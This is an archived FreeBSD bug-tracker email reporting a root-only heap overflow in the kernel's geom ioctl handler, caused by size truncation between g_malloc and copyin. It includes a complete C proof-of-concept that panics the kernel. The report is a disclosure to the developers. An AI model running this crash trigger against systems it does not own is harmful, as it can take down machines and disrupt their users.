Date: Wed, 27 Apr 2016 22:41:05 +0000 From: bugzilla-noreply@freebsd.org To: freebsd-bugs@FreeBSD.org Subject: [Bug 209113] Heap overflow in geom ioctl handler Message-ID: <bug-209113-8@https.bugs.freebsd.org/bugzilla/>
next in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D209113 Bug ID: 209113 Summary: Heap overflow in geom ioctl handler Product: Base System Version: 11.0-CURRENT Hardware: Any OS: Any Status: New Severity: Affects Only Me Priority: --- Component: kern Assignee: freebsd-bugs@FreeBSD.org Reporter: cturt@hardenedbsd.org There is a heap overflow in the `ioctl` handler for `geom`, which is non-critical since it is only triggerable as `root`. Essentially, there are no checks on the user supplied `req.narg` value. The code uses this value to calculate a size by multiplying by `sizeof(struct gctl_req_arg)`, and then calls `g_malloc` and `copyin`. `g_malloc` treats its `size` parameter as an `int`: static __inline void *g_malloc(int size, int flags) So this size will be truncated to 32 bit, however the `copyin` call will use the full 64 bit size. PoC to trigger the bug, resulting in panic (must be run as `root`): #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/types.h> #include <sys/ioctl.h> #include <geom/geom_ctl.h> int main(void) { int result; struct gctl_req req; int g; g =3D open("/dev/geom.ctl", O_RDONLY); if(g =3D=3D -1) { printf(" [-] Couldn't open geom.ctl!\n"); return 1; } req.error =3D malloc(0x100); req.lerror =3D 2; req.version =3D GCTL_VERSION; req.narg =3D 0x5555556; req.arg =3D malloc(0x4000); memset(req.arg, 'a', 0x4000); result =3D ioctl(g, GEOM_CTL, &req); printf("%d %d\n", result, errno); free(req.arg); return 0; } --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-209113-8>